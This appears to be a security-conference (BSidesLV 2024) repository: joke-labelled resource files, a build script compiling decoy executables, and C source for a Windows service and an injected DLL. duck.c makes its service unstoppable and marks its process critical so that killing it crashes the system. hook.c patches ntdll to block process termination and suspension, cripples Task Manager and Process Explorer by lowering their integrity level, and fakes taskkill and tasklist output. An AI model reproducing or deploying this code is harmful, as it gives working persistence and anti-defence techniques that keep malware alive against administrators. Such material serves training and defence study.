VS_VERSION_INFO VERSIONINFO 21 | FILEVERSION 69,69,69,69 22 | PRODUCTVERSION 69,69,69,69 23 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 24 | FILEFLAGS 0 25 | FILEOS VOS__WINDOWS32 26 | FILETYPE VFT_DLL 27 | FILESUBTYPE VFT2_UNKNOWN 28 | 29 | BEGIN 30 | BLOCK "StringFileInfo" 31 | BEGIN 32 | BLOCK "040904B0" 33 | BEGIN 34 | VALUE "Comments", "TO THE MOON!!" 35 | VALUE "CompanyName", "Bitconnect" 36 | VALUE "FileDescription", "Quick Cash Grab" 37 | VALUE "FileVersion", "69.69.69.69" 38 | VALUE "InternalName", "BITCONNECT!!!" 39 | VALUE "LegalCopyright", "Copyright(C) 2020 Bitconnect" 40 | VALUE "OriginalFilename", "bitcoin.exe" 41 | VALUE "ProductName", "Wasup, Wasup, Wasup, BITCONNECT!!!!" 42 | VALUE "ProductVersion", "69.69.69.69" 43 | END 44 | END 45 | BLOCK "VarFileInfo" 46 | BEGIN 47 | VALUE "Translation", 0x409, 1200 48 | END 49 | END 50 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/build.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | # Copyright (C) 2020 - 2024 iDigitalFlame 3 | # 4 | # This program is free software: you can redistribute it and/or modify 5 | # it under the terms of the GNU General Public License as published by 6 | # the Free Software Foundation, either version 3 of the License, or 7 | # any later version. 8 | # 9 | # This program is distributed in the hope that it will be useful, 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | # GNU General Public License for more details. 13 | # 14 | # You should have received a copy of the GNU General Public License 15 | # along with this program. If not, see . 16 | # 17 | 18 | x86_64-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i manifest.rc -o /tmp/manifest-64.o 19 | 20 | x86_64-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i duck.rc -o /tmp/duck-64.o 21 | x86_64-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o ../assets/duck.exe /tmp/duck-64.o /tmp/manifest-64.o duck.c 22 | 23 | x86_64-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i malware.rc -o /tmp/malware-64.o 24 | x86_64-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o ../assets/malware.exe /tmp/malware-64.o /tmp/manifest-64.o nop.c 25 | 26 | x86_64-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i bitcoin.rc -o /tmp/bitcoin-64.o 27 | x86_64-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o ../assets/bitcoin.exe /tmp/bitcoin-64.o /tmp/manifest-64.o nop.c 28 | 29 | x86_64-w64-mingw32-windres --codepage=0xFDE9 --language=0x409 --output-format=coff -i dolphin.rc -o /tmp/dolphin-64.o 30 | x86_64-w64-mingw32-gcc -mwindows -fPIC -lkernel32 -lntdll -Wa,--strip-local-absolute -Wp,-femit-struct-debug-reduced,-O2 -Wl,-x,-s,-nostdlib,--no-insert-timestamp -o ../assets/dolphin.exe /tmp/dolphin-64.o /tmp/manifest-64.o nop_svc.c 31 | 32 | rm /tmp/manifest-64.o 33 | rm /tmp/malware-64.o 34 | rm /tmp/bitcoin-64.o 35 | rm /tmp/dolphin-64.o 36 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/dolphin.ico: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:f142ed78775191a4947fd53a7e0de4a7d0739bc285b4d48f47d72146fb7c8301 3 | size 41662 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/dolphin.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #include 18 | 19 | IDI_ICON_128 ICON "dolphin.ico" 20 | VS_VERSION_INFO VERSIONINFO 21 | FILEVERSION 0,1,2,1 22 | PRODUCTVERSION 0,1,2,1 23 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 24 | FILEFLAGS 0 25 | FILEOS VOS__WINDOWS32 26 | FILETYPE VFT_DLL 27 | FILESUBTYPE VFT2_UNKNOWN 28 | 29 | BEGIN 30 | BLOCK "StringFileInfo" 31 | BEGIN 32 | BLOCK "040904B0" 33 | BEGIN 34 | VALUE "Comments", "Trust me... im a dolphin" 35 | VALUE "CompanyName", "The Mighty Seas" 36 | VALUE "FileDescription", "Totally not a virus." 37 | VALUE "FileVersion", "0.1.2.1" 38 | VALUE "InternalName", "Dolphin" 39 | VALUE "LegalCopyright", "wut" 40 | VALUE "OriginalFilename", "dolphin.exe" 41 | VALUE "ProductName", "Totally not a virus. Trust me... im a dolphin" 42 | VALUE "ProductVersion", "0.1.2.1" 43 | END 44 | END 45 | BLOCK "VarFileInfo" 46 | BEGIN 47 | VALUE "Translation", 0x409, 1200 48 | END 49 | END 50 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/duck.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #define WINVER 0x0501 18 | #define _WIN32_WINNT 0x0501 19 | 20 | #define NOWH 21 | #define NOMB 22 | #define NOMSG 23 | #define NONLS 24 | #define NOMCX 25 | #define NOIME 26 | #define NOHELP 27 | #define NOCOMM 28 | #define NOICONS 29 | #define NOCRYPT 30 | #define NOKANJI 31 | #define NOSOUND 32 | #define NOCOLOR 33 | #define NOMENUS 34 | #define NOCTLMGR 35 | #define NOMINMAX 36 | #define NOSCROLL 37 | #define NODRAWTEXT 38 | #define NOMETAFILE 39 | #define NOPROFILER 40 | #define NOKEYSTATES 41 | #define NORASTEROPS 42 | #define NOCLIPBOARD 43 | #define NOWINSTYLES 44 | #define NOSYSMETRICS 45 | #define NOWINOFFSETS 46 | #define NOSHOWWINDOW 47 | #define NOTEXTMETRIC 48 | #define NOSYSCOMMANDS 49 | #define NOGDICAPMASKS 50 | #define NOWINMESSAGES 51 | #define NODEFERWINDOWPOS 52 | #define NOVIRTUALKEYCODES 53 | #define WIN32_LEAN_AND_MEAN 54 | 55 | #include 56 | #include 57 | 58 | typedef NTSTATUS(WINAPI *funcNtAdjustTokenPrivileges)( 59 | HANDLE TokenHandle, 60 | BOOLEAN DisableAllPrivileges, 61 | PTOKEN_PRIVILEGES NewState, 62 | ULONG BufferLength, 63 | PTOKEN_PRIVILEGES PreviousState, 64 | PULONG ReturnLength); 65 | typedef NTSTATUS(WINAPI *funcNtSetInformationProcess)( 66 | HANDLE ProcessHandle, 67 | PROCESSINFOCLASS ProcessInformationClass, 68 | PVOID ProcessInformation, 69 | ULONG ProcessInformationLength); 70 | typedef NTSTATUS(WINAPI *funcNtQueryInformationProcess)( 71 | HANDLE ProcessHandle, 72 | PROCESSINFOCLASS ProcessInformationClass, 73 | PVOID ProcessInformation, 74 | ULONG ProcessInformationLength, 75 | PULONG ReturnLength); 76 | 77 | DWORD last; 78 | HANDLE stopper; 79 | SERVICE_STATUS_HANDLE duck; 80 | 81 | VOID DuckSetup(); 82 | VOID DuckDisable(); 83 | BOOL DuckDebug(HANDLE, DWORD); 84 | 85 | VOID WINAPI DuckStatus(DWORD); 86 | VOID WINAPI DuckService(DWORD, LPWSTR *); 87 | 88 | HMODULE ntdll; 89 | funcNtAdjustTokenPrivileges fNtAdjustTokenPrivileges; 90 | funcNtSetInformationProcess fNtSetInformationProcess; 91 | 92 | int main(int argc, char *argv[]) { 93 | SERVICE_TABLE_ENTRYW t[] = {{L"", &DuckService}, {NULL, NULL}}; 94 | StartServiceCtrlDispatcherW(t); 95 | return 0; 96 | } 97 | 98 | BOOL DuckDebug(HANDLE t, DWORD s) { 99 | if (fNtAdjustTokenPrivileges == NULL) { 100 | return FALSE; 101 | } 102 | TOKEN_PRIVILEGES p; 103 | p.PrivilegeCount = 1; 104 | p.Privileges[0].Attributes = s; 105 | p.Privileges[0].Luid.HighPart = 0; 106 | p.Privileges[0].Luid.LowPart = 0x14; // SE_DEBUG_PRIVILEGE 107 | DWORD u = 0; 108 | NTSTATUS r = fNtAdjustTokenPrivileges(t, FALSE, &p, 0x7C, NULL, &u); 109 | CloseHandle(t); 110 | if (r == 0) { 111 | return TRUE; 112 | } 113 | return FALSE; 114 | } 115 | 116 | VOID DuckSetup() { 117 | ntdll = LoadLibraryW(L"ntdll.dll"); 118 | if (ntdll == NULL) { 119 | return; 120 | } 121 | fNtAdjustTokenPrivileges = (funcNtAdjustTokenPrivileges)GetProcAddress(ntdll, "NtAdjustPrivilegesToken"); 122 | fNtSetInformationProcess = (funcNtSetInformationProcess)GetProcAddress(ntdll, "NtSetInformationProcess"); 123 | funcNtQueryInformationProcess fNtQuery = (funcNtQueryInformationProcess)GetProcAddress(ntdll, "NtQueryInformationProcess"); 124 | if (fNtQuery == NULL || fNtAdjustTokenPrivileges == NULL || fNtSetInformationProcess == NULL) { 125 | return; 126 | } 127 | HANDLE t; 128 | // 0x200E8 - TOKEN_READ (STANDARD_RIGHTS_READ | TOKEN_QUERY) | TOKEN_WRITE 129 | // (TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | 130 | // TOKEN_ADJUST_DEFAULT) 131 | if (OpenProcessToken(GetCurrentProcess(), 0x200E8, &t) == 0) { 132 | return; 133 | } 134 | // 0x2 - SE_PRIVILEGE_ENABLED 135 | if (DuckDebug(t, 0x2)) { 136 | // 0x1D - ProcessBreakOnTermination 137 | DWORD r = 0; 138 | if (fNtQuery(GetCurrentProcess(), 0x1D, &last, 0x4, &r) > 0) { 139 | return; 140 | } 141 | DWORD v = 1; 142 | fNtSetInformationProcess(GetCurrentProcess(), 0x1D, &v, 0x4); 143 | // 0x0 - SE_PRIVILEGE_DISABLED 144 | DuckDebug(t, 0); 145 | } 146 | return; 147 | } 148 | VOID DuckDisable() { 149 | if (last > 0) { 150 | return; 151 | } 152 | HANDLE t; 153 | // 0x200E8 - TOKEN_READ (STANDARD_RIGHTS_READ | TOKEN_QUERY) | TOKEN_WRITE 154 | // (TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | 155 | // TOKEN_ADJUST_DEFAULT) 156 | if (OpenProcessToken(GetCurrentProcess(), 0x200E8, &t) == 0) { 157 | return; 158 | } 159 | // 0x2 - SE_PRIVILEGE_ENABLED 160 | if (DuckDebug(t, 0x2)) { 161 | // 0x1D - ProcessBreakOnTermination 162 | fNtSetInformationProcess(GetCurrentProcess(), 0x1D, &last, 0x4); 163 | // 0x0 - SE_PRIVILEGE_DISABLED 164 | DuckDebug(t, 0); 165 | } 166 | CloseHandle(t); 167 | return; 168 | } 169 | 170 | DWORD WINAPI DuckUpdate(DWORD c, DWORD v, void *d, void *x) { 171 | switch (c) { 172 | case SERVICE_CONTROL_STOP: 173 | // No stopping 174 | break; 175 | case SERVICE_CONTROL_SHUTDOWN: 176 | DuckStatus(0x3); 177 | SetEvent(stopper); 178 | break; 179 | default: 180 | DuckStatus(0x4); 181 | break; 182 | } 183 | return 0; 184 | } 185 | 186 | VOID WINAPI DuckStatus(DWORD s) { 187 | // Only set that we reply to SERVICE_CONTROL_SHUTDOWN 188 | SERVICE_STATUS v = {0x10, s, 0x4, 0, 0, 0, 0}; 189 | SetServiceStatus(duck, &v); 190 | } 191 | VOID WINAPI DuckService(DWORD argc, LPWSTR *argv) { 192 | duck = RegisterServiceCtrlHandlerExW(L"DuckService", &DuckUpdate, NULL); 193 | DuckStatus(0x2); // SERVICE_START_PENDING 194 | DuckSetup(); 195 | stopper = CreateEventW(NULL, TRUE, FALSE, NULL); 196 | DuckStatus(0x4); // SERVICE_RUNNING 197 | WaitForSingleObject(stopper, INFINITE); 198 | DuckStatus(0x3); // SERVICE_STOP_PENDING 199 | DuckDisable(); 200 | if (ntdll != NULL) { 201 | FreeLibrary(ntdll); 202 | } 203 | CloseHandle(stopper); 204 | DuckStatus(0x1); // SERVICE_STOPPED 205 | } 206 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/duck.ico: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:3ab397eb09908257cfd417760fcac5974975fafbb59cb3effbec8d0d7a19ff78 3 | size 38078 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/duck.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #include 18 | 19 | IDI_ICON_128 ICON "duck.ico" 20 | VS_VERSION_INFO VERSIONINFO 21 | FILEVERSION 4,5,6,69 22 | PRODUCTVERSION 4,5,6,69 23 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 24 | FILEFLAGS 0 25 | FILEOS VOS__WINDOWS32 26 | FILETYPE VFT_DLL 27 | FILESUBTYPE VFT2_UNKNOWN 28 | 29 | BEGIN 30 | BLOCK "StringFileInfo" 31 | BEGIN 32 | BLOCK "040904B0" 33 | BEGIN 34 | VALUE "Comments", "*quack*" 35 | VALUE "CompanyName", "The Pond, LLC" 36 | VALUE "FileDescription", "Uhhh... I'm a duck!" 37 | VALUE "FileVersion", "4.5.6.69" 38 | VALUE "InternalName", "Duck!" 39 | VALUE "LegalCopyright", "Copyright(C) 1920 WaterFowl" 40 | VALUE "OriginalFilename", "duck.exe" 41 | VALUE "ProductName", "Duck Service, Very Important" 42 | VALUE "ProductVersion", "4.5.6.69" 43 | END 44 | END 45 | BLOCK "VarFileInfo" 46 | BEGIN 47 | VALUE "Translation", 0x409, 1200 48 | END 49 | END 50 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/hook.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #define WINVER 0x0501 18 | #define _WIN32_WINNT 0x0501 19 | 20 | #define NOWH 21 | #define NOMB 22 | #define NOGDI 23 | #define NOMSG 24 | #define NONLS 25 | #define NOMCX 26 | #define NOIME 27 | #define NOHELP 28 | #define NOCOMM 29 | #define NOICONS 30 | #define NOCRYPT 31 | #define NOKANJI 32 | #define NOSOUND 33 | #define NOCOLOR 34 | #define NOMENUS 35 | #define NOCTLMGR 36 | #define NOMINMAX 37 | #define NOSCROLL 38 | #define NODRAWTEXT 39 | #define NOMETAFILE 40 | #define NOPROFILER 41 | #define NOKEYSTATES 42 | #define NORASTEROPS 43 | #define NOCLIPBOARD 44 | #define NOWINSTYLES 45 | #define NOSYSMETRICS 46 | #define NOWINOFFSETS 47 | #define NOSHOWWINDOW 48 | #define NOTEXTMETRIC 49 | #define NOSYSCOMMANDS 50 | #define NOGDICAPMASKS 51 | #define NOWINMESSAGES 52 | #define NODEFERWINDOWPOS 53 | #define NOVIRTUALKEYCODES 54 | #define WIN32_LEAN_AND_MEAN 55 | 56 | #define UNICODE 57 | #define EXPORT __declspec(dllexport) 58 | 59 | #include 60 | #include 61 | #include 62 | #include 63 | #include 64 | #include 65 | #include 66 | #include 67 | #include 68 | 69 | #define SIZE_A 10 70 | #define SIZE_B 17 71 | #define SIZE_C 2 72 | #define SIZE_D 1 73 | #define SIZE_JUMP 5 74 | // #define SIZE_PATCH 19 75 | #define SIZE_PATCH 14 76 | 77 | typedef struct hook { 78 | HANDLE mutex; 79 | LPVOID target; 80 | unsigned char orig[SIZE_JUMP]; 81 | unsigned char patch[SIZE_JUMP]; 82 | } hook; 83 | typedef struct LANG { 84 | WORD wLanguage; 85 | WORD wCodePage; 86 | } LANG_INFO; 87 | typedef long long ptr; 88 | typedef NTSTATUS(NTAPI *funcNtTerminateProcess)(HANDLE, NTSTATUS); 89 | 90 | HANDLE mutexGlobal; 91 | 92 | unsigned char jump[SIZE_PATCH] = { 93 | 0x90, // nop 94 | 0x49, 0xBB, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, // movabs r11, 95 | 0x41, 0x53, // push r11 96 | 0xC3, // ret 97 | }; 98 | 99 | /* Older version 100 | unsigned char jump[SIZE_PATCH] = { 101 | 0x90, // nop 102 | 0x49, 0x89, 0xC3, // mv r11,rax 103 | 0x48, 0xB8, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, // mv rax, 104 | 0x50, // push rax 105 | 0x49, 0x8B, 0xC3, // mv rax,r11 106 | 0xC3, // ret 107 | }; 108 | */ 109 | 110 | const char *targetsA[SIZE_A] = { 111 | "taskmgr.exe\0", 112 | "procexp.exe\0", 113 | "tcpview.exe\0", 114 | "procmon.exe\0", 115 | "procmon86.exe\0", 116 | "procmon32.exe\0", 117 | "procexp64.exe\0", 118 | "procexpx64.exe\0", 119 | "processhacker.exe\0", 120 | "processhacker2.exe\0", 121 | }; 122 | const char *targetsB[SIZE_B] = { 123 | "slui.exe\0", 124 | "lsass.exe\0", 125 | "wermgr.exe\0", 126 | "spoolsv.exe\0", 127 | "svchost.exe\0", 128 | "DLLHost.exe\0", 129 | "LogonUI.exe\0", 130 | "regedit.exe\0", 131 | "consent.exe\0", 132 | "explorer.exe\0", 133 | "iexplore.exe\0", 134 | "rundll32.exe\0", 135 | "werfault.exe\0", 136 | "winlogon.exe\0", 137 | "taskhost.exe\0", 138 | "taskhostex.exe\0", 139 | "ServerManager.exe\0"}; 140 | const char *targetsC[SIZE_C] = { 141 | "taskmgr.exe\0", 142 | "powershell.exe\0"}; 143 | const char *targetsD[SIZE_D] = { 144 | "Process Hacker\0"}; 145 | 146 | hook NtSuspendThreadHook; 147 | hook NtSuspendProcessHook; 148 | hook NtTerminateProcessHook; 149 | 150 | funcNtTerminateProcess NtTerminateProcess; 151 | 152 | NTSTATUS NTAPI NtSuspendProcessFunc(HANDLE); 153 | NTSTATUS NTAPI NtSuspendThreadFunc(HANDLE, PULONG); 154 | NTSTATUS NTAPI NtTerminateProcessFunc(HANDLE, NTSTATUS); 155 | 156 | int IsExclude(int, WCHAR[MAX_PATH]); 157 | int IsProcName(int, WCHAR *, int, const char *); 158 | 159 | DWORD DoUntrust(void) { 160 | Sleep(500); 161 | HANDLE t; 162 | if (!OpenProcessToken(GetCurrentProcess(), 0x200A8, &t)) { 163 | return 0; 164 | } 165 | SID a; 166 | DWORD c = 32; 167 | if (!CreateWellKnownSid(0x41, NULL, &a, &c)) { 168 | CloseHandle(t); 169 | return 0; 170 | } 171 | SID_AND_ATTRIBUTES b; 172 | b.Sid = &a; 173 | b.Attributes = 0x20; 174 | SetTokenInformation(t, 0x19, &b, c + 4); 175 | CloseHandle(t); 176 | } 177 | 178 | int IsProcByVersion(WCHAR s[MAX_PATH]) { 179 | DWORD n = GetFileVersionInfoSizeW(s, 0); 180 | if (n == 0) { 181 | return FALSE; 182 | } 183 | LPVOID b = (LPVOID)calloc(n, 1); 184 | if (b == NULL) { 185 | return FALSE; 186 | } 187 | if (!GetFileVersionInfoW(s, 0, n, b)) { 188 | free(b); 189 | return FALSE; 190 | } 191 | UINT c; 192 | LANG_INFO *l; 193 | if (!VerQueryValueW(b, L"\\VarFileInfo\\Translation", (LPVOID *)&l, &c)) { 194 | free(b); 195 | return FALSE; 196 | } 197 | UINT x; 198 | WCHAR *d; 199 | WCHAR v[255]; 200 | for (int i = 0; i < (c / sizeof(LANG_INFO)); i++) { 201 | if (FAILED(StringCchPrintfW(v, 255, L"\\StringFileInfo\\%04x%04x\\FileDescription", l[i].wLanguage, l[i].wCodePage))) { 202 | continue; 203 | } 204 | if (!VerQueryValueW(b, v, (LPVOID *)&d, &x) || x == 0) { 205 | continue; 206 | } 207 | for (int k = 0; k < SIZE_D; k++) { 208 | if (IsProcName(x - 1, d, strlen(targetsD[i]), targetsD[i])) { 209 | free(b); 210 | return TRUE; 211 | } 212 | } 213 | } 214 | free(b); 215 | return FALSE; 216 | } 217 | int IsUntrust(int sn, WCHAR s[MAX_PATH]) { 218 | for (int i = 0; i < SIZE_A; i++) { 219 | if (IsProcName(sn, s, strlen(targetsA[i]), targetsA[i])) { 220 | return TRUE; 221 | } 222 | } 223 | if (IsExclude(sn, s)) { 224 | return FALSE; 225 | } 226 | return IsProcByVersion(s); 227 | } 228 | int IsExclude(int sn, WCHAR s[MAX_PATH]) { 229 | for (int i = 0; i < SIZE_B; i++) { 230 | if (IsProcName(sn, s, strlen(targetsB[i]), targetsB[i])) { 231 | return TRUE; 232 | } 233 | } 234 | return FALSE; 235 | } 236 | int IsHookTerminate(int sn, WCHAR s[MAX_PATH]) { 237 | if (IsUntrust(sn, s)) { 238 | return TRUE; 239 | } 240 | for (int i = 0; i < SIZE_C; i++) { 241 | if (IsProcName(sn, s, strlen(targetsC[i]), targetsC[i])) { 242 | return TRUE; 243 | } 244 | } 245 | return FALSE; 246 | } 247 | int IsProcName(int srcLen, WCHAR *src, int findLen, const char *find) { 248 | if (findLen > srcLen) { 249 | return FALSE; 250 | } 251 | for (int i = 1; findLen - i >= 0 && srcLen - i >= 0; i++) { 252 | if (tolower(find[findLen - i]) == tolower(src[srcLen - i])) { 253 | continue; 254 | } 255 | return FALSE; 256 | } 257 | return TRUE; 258 | } 259 | 260 | ptr Find(int size, ptr module, ptr func) { 261 | SIZE_T n; 262 | int c = 0; 263 | unsigned char b[1024]; 264 | for (ptr x = module; x < func + 65535; x += 1024) { 265 | if (ReadProcessMemory(GetCurrentProcess(), (LPVOID)x, b, 1024, &n) == 0) { 266 | return 0; 267 | } 268 | for (int i = 0; i < n; i++) { 269 | if (b[i] == 0x90 || b[i] == 0xCC) { 270 | if (c >= size + 1) { 271 | return x + i - size; 272 | } 273 | c++; 274 | continue; 275 | } 276 | c = 0; 277 | } 278 | } 279 | return 0; 280 | } 281 | 282 | void Redo(hook *h) { 283 | SIZE_T n; 284 | WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 285 | ReleaseMutex(h->mutex); 286 | } 287 | void Undo(hook *h) { 288 | if (h->mutex == NULL || h->target == 0) { 289 | return; 290 | } 291 | WaitForSingleObject(h->mutex, INFINITE); 292 | SIZE_T n; 293 | WriteProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n); 294 | } 295 | void Hook(hook *h, HANDLE mod, FARPROC func, ptr replacement) { 296 | if (mod == NULL || func == NULL || replacement == 0) { 297 | return; 298 | } 299 | ptr b = Find(SIZE_PATCH, (ptr)mod, (ptr)func); 300 | if (b == 0) { 301 | return; 302 | } 303 | SIZE_T n; 304 | h->target = (LPVOID)func; 305 | DWORD p; 306 | VirtualProtect(h->target, SIZE_JUMP, PAGE_EXECUTE_READWRITE, &p); 307 | if (ReadProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n) == 0 || n != SIZE_JUMP) { 308 | h->target = 0; 309 | return; 310 | } 311 | if (h->orig[0] == 0xE9) { 312 | h->target = 0; 313 | return; 314 | } 315 | WaitForSingleObject(mutexGlobal, INFINITE); 316 | jump[10] = (replacement >> 56) & 0xFF; 317 | jump[9] = (replacement >> 48) & 0xFF; 318 | jump[8] = (replacement >> 40) & 0xFF; 319 | jump[7] = (replacement >> 32) & 0xFF; 320 | jump[6] = (replacement >> 24) & 0xFF; 321 | jump[5] = (replacement >> 16) & 0xFF; 322 | jump[4] = (replacement >> 8) & 0xFF; 323 | jump[3] = replacement & 0xFF; 324 | VirtualProtect((LPVOID)b, SIZE_PATCH, PAGE_EXECUTE_READWRITE, &p); 325 | if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)b, jump, SIZE_PATCH, &n) == 0 || n != SIZE_PATCH) { 326 | ReleaseMutex(mutexGlobal); 327 | return; 328 | } 329 | ptr d = (b - 4) - (ptr)func; 330 | h->patch[4] = (d >> 24) & 0xFF; 331 | h->patch[3] = (d >> 16) & 0xFF; 332 | h->patch[2] = (d >> 8) & 0xFF; 333 | h->patch[1] = d & 0xFF; 334 | h->patch[0] = 0xE9; 335 | DWORD r = WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 336 | ReleaseMutex(mutexGlobal); 337 | if (r == 0 || n != SIZE_JUMP) { 338 | return; 339 | } 340 | h->mutex = CreateMutex(NULL, FALSE, NULL); 341 | } 342 | 343 | EXPORT BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID args) { 344 | if (r != DLL_PROCESS_ATTACH) { 345 | return TRUE; 346 | } 347 | DisableThreadLibraryCalls(h); 348 | WCHAR s[MAX_PATH]; 349 | DWORD n = GetModuleFileNameW(NULL, (LPWSTR)s, MAX_PATH); 350 | if (n == 0) { 351 | return TRUE; 352 | } 353 | if (IsExclude(n, s)) { 354 | return FALSE; 355 | } 356 | if (IsProcName(n, s, 12, "taskkill.exe\0")) { 357 | printf("SUCCESS\n\0"); 358 | ExitProcess(0); 359 | return TRUE; 360 | } 361 | if (IsProcName(n, s, 12, "tasklist.exe\0")) { 362 | printf("Image Name PID Session Name Session# Mem Usage\n\0"); 363 | printf("========================= ======== ================ =========== ============\n\0"); 364 | printf("System Idle Process 0 Services 0 0 K\n\0"); 365 | printf("System 4 Services 0 0 K\n\0"); 366 | printf("smss.exe 0 Services 0 0 K\n\0"); 367 | printf("csrss.exe 0 Console 0 0 K\n\0"); 368 | printf("duck.exe -1 Services 1 0 K\n\0"); 369 | printf("wininit.exe 0 Services 0 0 K\n\0"); 370 | printf("never_gonna 10 Console 1 0 K\n\0"); 371 | printf("give_you_up 11 Console 1 0 K\n\0"); 372 | printf("never_gonna 12 Console 1 0 K\n\0"); 373 | printf("let_you_down 13 Console 1 0 K\n\0"); 374 | printf("never_gonna 14 Console 1 0 K\n\0"); 375 | printf("run_around 15 Console 1 0 K\n\0"); 376 | printf("and_hurt_you 16 Console 1 0 K\n\0"); 377 | printf("never_gonna 17 Console 1 0 K\n\0"); 378 | printf("say_goodbye 18 Console 1 0 K\n\0"); 379 | printf("never_gonna 19 Console 1 0 K\n\0"); 380 | printf("see_you_cry 20 Console 1 0 K\n\0"); 381 | ExitProcess(0); 382 | return TRUE; 383 | } 384 | if (IsProcName(n, s, 11, "notepad.exe\0")) { 385 | return TRUE; 386 | } 387 | if (IsUntrust(n, s)) { 388 | CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)DoUntrust, NULL, 0, NULL); 389 | } 390 | HANDLE a = LoadLibraryW(L"ntdll.dll"); 391 | Hook(&NtSuspendProcessHook, a, GetProcAddress(a, "NtSuspendProcess"), (ptr)&NtSuspendProcessFunc); 392 | if (IsHookTerminate(n, s)) { 393 | Hook(&NtSuspendThreadHook, a, GetProcAddress(a, "NtSuspendThread"), (ptr)&NtSuspendThreadFunc); 394 | NtTerminateProcess = (funcNtTerminateProcess)GetProcAddress(a, "NtTerminateProcess"); 395 | Hook(&NtTerminateProcessHook, a, (FARPROC)NtTerminateProcess, (ptr)&NtTerminateProcessFunc); 396 | } 397 | return TRUE; 398 | } 399 | 400 | NTSTATUS NTAPI NtSuspendProcessFunc(HANDLE h) { 401 | return 0; 402 | } 403 | NTSTATUS NTAPI NtSuspendThreadFunc(HANDLE h, PULONG x) { 404 | return 0; 405 | } 406 | NTSTATUS NTAPI NtTerminateProcessFunc(HANDLE h, NTSTATUS x) { 407 | if (GetProcessId(h) != GetCurrentProcessId()) { 408 | return 1; 409 | } 410 | Undo(&NtTerminateProcessHook); 411 | NTSTATUS r = NtTerminateProcess(h, x); 412 | Redo(&NtTerminateProcessHook); 413 | return r; 414 